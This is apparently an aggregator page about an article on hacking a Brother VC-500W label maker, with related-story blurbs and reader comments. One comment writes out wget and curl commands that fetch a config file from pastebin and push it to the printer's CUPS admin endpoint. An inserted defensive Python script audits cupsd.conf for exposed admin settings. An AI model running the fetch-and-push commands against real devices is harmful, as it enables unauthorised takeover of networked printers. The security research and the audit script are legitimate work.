Pwning a Brother labelmaker, for fun and interop
The author explores vulnerabilities in a Brother label maker, discovering outdated software and potential exploits like executing arbitrary code. Challenges arise, including unintentional device configuration issues and limited understanding of printer systems.
The article discusses the author's exploration of a Brother label maker, specifically the VC-500W model, which was found to be running outdated software, including a 2012 version of CUPS and an old Linux kernel on an ARMv5 architecture. The author discovered vulnerabilities in the device, such as the ability to execute arbitrary code through manipulating input fields in the setup utility. Attempts to exploit the vulnerabilities included trying to gain remote code execution and accessing system files like /etc/passwd. Despite encountering challenges and inadvertently causing issues with the device's configuration, the author continued to investigate potential exploits, including leveraging CUPS errors for arbitrary file write. Additionally, the author found a publicly accessible S3 bucket containing encrypted upgrade packages for the device, which could potentially be decrypted to create custom firmware. The article concludes with the author's reflections on the difficulty of exploiting the device further due to limited understanding of CUPS and printer systems.
Related
Hacking eInk Price Tags (2021)
Hackers repurpose eInk electronic shelf labels (ESLs) into photo frames or status displays by customizing firmware. Detailed exploration of hacking challenges, including Marvell chip analysis, bootloader functions, memory storage, communication protocols, and debugging methods.
Vulnerability in Popular PC and Server Firmware
Eclypsium found a critical vulnerability (CVE-2024-0762) in Intel Core processors' Phoenix SecureCore UEFI firmware, potentially enabling privilege escalation and persistent attacks. Lenovo issued BIOS updates, emphasizing the significance of supply chain security.
CVE-2021-4440: A Linux CNA Case Study
The Linux CNA mishandled CVE-2021-4440 in the 5.10 LTS kernel, causing information leakage and KASLR defeats. The issue affected Debian Bullseye and SUSE's 5.3.18 kernel, resolved in version 5.10.218.
The weirdest QNX bug I've ever encountered
The author encountered a CPU usage bug in a QNX system's 'ps' utility due to a 15-year-old bug. Debugging revealed a race condition, leading to code modifications and a shift towards open-source solutions.
RegreSSHion: RCE in OpenSSH's server, on glibc-based Linux systems
A vulnerability in OpenSSH's server on glibc-based Linux systems (CVE-2024-6387) allows remote code execution. Exploiting this flaw requires precise timing. The advisory discusses exploitation details, success rates, and contacting developers for related issues.
> There's a CUPS version that's 10+ years old, Linux kernel almost old enough to drink, all of that r̶u̶n̶n̶i̶n̶g̶ crawling on an ARMv5.
> but it seems that they have one specific design and they're happy to milk it for as long and as cheap as possible
Like who fucking cares how old the CPU in a label printer is?
Here ya go, I fixed it (or just see the pastebin link if you're curious what it says):
wget -O conffile https://pastebin.com/raw/eGfKdvh8
curl ... \
--data-urlencode 'org.cups.sid=1862ff74a0c01dd0fb444934e7e67e05' \
--data-urlencode 'OP=config-server' \
--data-urlencode "CUPSDCONF@conffile" \
--data-urlencode 'SAVECHANGES=Save+Changes' >/dev/null
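The comment above pushes a whole cupsd.conf at the printer through the CUPS web admin's config-server operation, which is exactly the surface an operator wants to know the state of before a device like this goes on a shared network. As an added example (not code from the article, from this thread, or from Brother or the CUPS project), here is a small Python linter that parses a cupsd.conf and flags the settings that leave the admin interface reachable and unauthenticated; the two sample configs, the directive list and the checks themselves are the example's own assumptions, constructed to illustrate a weak setting beside its hardened form.

```python
"""Audit a cupsd.conf for an exposed, unauthenticated admin interface.

Added example, not the article's or the CUPS project's code. The directives
checked and the sample configs below are this example's own assumptions.
"""
import re

# Constructed sample: roughly what a permissive appliance cupsd.conf looks like.
WEAK_CUPSD_CONF = """
LogLevel warn
Listen *:631
Listen /var/run/cups/cups.sock
DefaultAuthType None
WebInterface Yes
<Location />
  Order allow,deny
  Allow all
</Location>
<Location /admin>
  Order allow,deny
  Allow all
</Location>
<Location /admin/conf>
  AuthType Default
  Require user @SYSTEM
  Order allow,deny
  Allow @LOCAL
</Location>
"""

# Constructed sample: the same file with the admin surface bound to loopback
# and gated behind authentication.
HARDENED_CUPSD_CONF = """
LogLevel warn
Listen localhost:631
Listen /var/run/cups/cups.sock
DefaultAuthType Basic
<Location />
  Order allow,deny
  Allow localhost
</Location>
<Location /admin>
  AuthType Default
  Require user @SYSTEM
  Order allow,deny
  Allow localhost
</Location>
<Location /admin/conf>
  AuthType Default
  Require user @SYSTEM
  Order allow,deny
  Allow localhost
</Location>
"""


def parse_cupsd_conf(text):
    """Split a cupsd.conf into global directives and per-<Location> directives.

    Returns (globals, locations): globals maps directive -> [values];
    locations maps a path such as "/admin" -> {directive: [values]}.
    """
    globals_, locations, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        opened = re.match(r"<Location\s+(\S+)\s*>", line, re.I)
        if opened:
            current = locations.setdefault(opened.group(1), {})
            continue
        if re.match(r"</Location\s*>", line, re.I):
            current = None
            continue
        key, _, value = line.partition(" ")
        target = current if current is not None else globals_
        target.setdefault(key, []).append(value.strip())
    return globals_, locations


def audit_cupsd_conf(text):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    g, locs = parse_cupsd_conf(text)
    # Listen */0.0.0.0/[::] or a bare "Port N" binds every interface.
    for v in g.get("Listen", []) + g.get("Port", []):
        if v.startswith(("*:", "0.0.0.0", "[::]")) or v.isdigit():
            findings.append(f"Listen on all interfaces: {v}")
    if any(v.lower() == "none" for v in g.get("DefaultAuthType", [])):
        findings.append("DefaultAuthType None: admin operations need no credentials")
    # The two locations that matter for config upload and admin operations.
    for path in ("/admin", "/admin/conf"):
        loc = locs.get(path)
        if loc is None:
            findings.append(f"No <Location {path}> block: inherits the parent ACL")
            continue
        if "Require" not in loc and "AuthType" not in loc:
            findings.append(f"{path}: no AuthType/Require, unauthenticated")
        if any(v.lower() == "all" for v in loc.get("Allow", [])):
            findings.append(f"{path}: Allow all")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CUPSD_CONF), ("hardened", HARDENED_CUPSD_CONF)):
        print(name, audit_cupsd_conf(conf) or "no findings")
```

Run it against a config pulled from the device (or from `/etc/cups/cupsd.conf` on any print server) and treat any finding on `/admin` or `/admin/conf` as a reason to bind the listener to loopback or put the device on an isolated VLAN; the parser deliberately ignores directives it does not know about rather than failing, so it tolerates the odd vendor-specific lines appliances tend to carry.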
Before throwing it away, I looked at it and it contained classified information.
> pxplus_ibm_vga8regular
https://www.bing.com/search?q=%22pxplus_ibm_vga8regular%22+f...
Why is it only available from seedy foreign font sites?
I had a Dymo D1-style label printer years ago and liked it, but it was a pain to get the backing to come off the labels when you wanted to stick them. (Dymo LabelManager PnP)
Then I got a Brother QL-1100 and it was a big step up. Labels easily come off the backing and if you want, 3rd party labels are cheap and available. I rarely pull out the Dymo anymore. You can even print like from a database and it will spit out a pile of cut labels with no intervention. Also Linux software on GitHub (haven't tried it).